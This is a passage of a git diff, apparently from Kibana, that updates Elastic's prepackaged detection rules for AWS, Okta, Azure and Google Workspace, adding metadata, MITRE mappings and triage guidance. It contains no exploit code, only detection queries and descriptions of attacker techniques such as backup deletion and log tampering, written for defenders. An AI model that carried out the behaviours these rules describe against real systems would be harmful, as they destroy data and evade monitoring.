"ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "119c8877-8613-416d-a98a-96b6664ee73a", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -30,7 +60,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Exfiltration" ], "threat": [ { @@ -45,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json index 36f53d2b60072..2b1a641bb7b65 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json @@ -2,7 +2,7 @@ "author": [ "Austin Songer" ], - "description": "Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account.", + "description": "Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data or evade detection after performing malicious activities. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account.", "false_positives": [ "Restoring snapshots may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Snapshot restoration by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], @@ -13,14 +13,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Snapshot Restored", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:RestoreDBInstanceFromDBSnapshot and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_RestoreDBInstanceFromDBSnapshot.html", "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bf1073bf-ce26-4607-b405-ba1ed8e9e204", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -28,20 +58,34 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Defense Evasion" ], "threat": [ { "framework": "MITRE ATT&CK", "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" }, - "technique": [] + "technique": [ + { + "id": "T1578", + "name": "Modify Cloud Compute Infrastructure", + "reference": "https://attack.mitre.org/techniques/T1578/", + "subtechnique": [ + { + "id": "T1578.004", + "name": "Revert Cloud Instance", + "reference": "https://attack.mitre.org/techniques/T1578/004/" + } + ] + } + ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json index a0b8d27b8bf3d..fc81a2057f80b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json @@ -17,6 +17,18 @@ "max_signals": 10000, "name": "External Alerts", "query": "event.kind:alert and not event.module:(endgame or endpoint)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 47, "risk_score_mapping": [ { @@ -64,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_admin_role_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_admin_role_deletion.json deleted file mode 100644 index 26170532f903e..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_admin_role_deletion.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a custom admin role is deleted. An adversary may delete a custom admin role in order to impact the permissions or capabilities of system administrators.", - "false_positives": [ - "Google Workspace admin roles may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Google Workspace Admin Role Deletion", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:DELETE_ROLE\n", - "references": [ - "https://support.google.com/a/answer/2406043?hl=en" - ], - "risk_score": 47, - "rule_id": "93e63c3e-4154-4fc6-9f86-b411e0987bbf", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_mfa_enforcement_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_mfa_enforcement_disabled.json deleted file mode 100644 index f4cd48f2f7e86..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_mfa_enforcement_disabled.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when multi-factor authentication (MFA) enforcement is disabled for Google Workspace users. An adversary may disable MFA enforcement in order to weaken an organization\u2019s security controls.", - "false_positives": [ - "MFA policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Google Workspace MFA Enforcement Disabled", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ENFORCE_STRONG_AUTHENTICATION and google_workspace.admin.new_value:false\n", - "references": [ - "https://support.google.com/a/answer/9176657?hl=en#" - ], - "risk_score": 47, - "rule_id": "cad4500a-abd7-4ef3-b5d3-95524de7cfe1", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 13 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_policy_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_policy_modified.json deleted file mode 100644 index 3876ce549fd6d..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_policy_modified.json +++ /dev/null @@ -1,34 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a Google Workspace password policy is modified. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", - "false_positives": [ - "Password policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Google Workspace Password Policy Modified", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and\n event.action:(CHANGE_APPLICATION_SETTING or CREATE_APPLICATION_SETTING) and\n google_workspace.admin.setting.name:(\n \"Password Management - Enforce strong password\" or\n \"Password Management - Password reset frequency\" or\n \"Password Management - Enable password reuse\" or\n \"Password Management - Enforce password policy at next login\" or\n \"Password Management - Minimum password length\" or\n \"Password Management - Maximum password length\"\n )\n", - "risk_score": 47, - "rule_id": "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 13 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json index ba55b3fc7a9bb..980b7118525d6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Revoke Okta API Token", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:system.api_token.revoke\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json index 61903a15c0993..75193633e15ca 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json @@ -14,14 +14,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EventBridge Rule Disabled or Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:eventbridge.amazonaws.com and event.action:(DeleteRule or DisableRule) and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:eventbridge.amazonaws.com and event.action:(DeleteRule or DisableRule) and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/eventbridge/latest/APIReference/API_DeleteRule.html", "https://docs.aws.amazon.com/eventbridge/latest/APIReference/API_DisableRule.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "87594192-4539-4bc4-8543-23bc3d5bd2b4", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Impact" ], "threat": [ { @@ -39,10 +70,16 @@ "name": "Impact", "reference": "https://attack.mitre.org/tactics/TA0040/" }, - "technique": [] + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_automation_runbook_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_automation_runbook_deleted.json deleted file mode 100644 index 83fd544c51f13..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_automation_runbook_deleted.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook that was used for persistence.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Runbook Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "risk_score": 21, - "rule_id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7", - "severity": "low", - "tags": [ - "Elastic", - "Cloud", - "Azure", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 5 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json index 486f7bb7ed06c..538d85a0ca83e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json @@ -16,13 +16,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Service Principal Credentials Added", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add service principal credentials\" and event.outcome:(success or Success)\n", "references": [ "https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f766ffaf-9568-4909-b734-75d19b35cbf4", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json index e86276e86052d..6e3df25343448 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json @@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Third-party Backup Files Deleted via Unexpected Process", - "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing\ndata recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the\nenvironment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete\nVeritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are\nnot from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing\ndata recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the\nenvironment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete\nVeritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are\nnot from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type == \"deletion\" and\n (\n /* Veeam Related Backup Files */\n (file.extension : (\"VBK\", \"VIB\", \"VBM\") and\n not process.executable : (\"?:\\\\Windows\\\\Veeam\\\\Backup\\\\*\",\n \"?:\\\\Program Files\\\\Veeam\\\\Backup and Replication\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veeam\\\\Backup and Replication\\\\*\")) or\n\n /* Veritas Backup Exec Related Backup File */\n (file.extension : \"BKF\" and\n not process.executable : (\"?:\\\\Program Files\\\\Veritas\\\\Backup Exec\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veritas\\\\Backup Exec\\\\*\"))\n )\n", "references": [ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json index 196f54bfc174d..c532b8ce462f6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Updated", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Updated\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your\nAmazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to\nactions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services\naccount activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and\nother Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and\ntroubleshooting.\n\nThis rule identifies a modification on CloudTrail settings using the API `UpdateTrail` action. Attackers can do this to\ncover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the response elements of the event to determine the scope of the changes.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:UpdateTrail and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_UpdateTrail.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "3e002465-876f-4f04-b016-84ef48ce7e5d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -73,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json index 9ad5f631ad307..4886517dde5e0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudWatch Log Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Log Group Deletion\n\nAmazon CloudWatch is a monitoring and observability service that 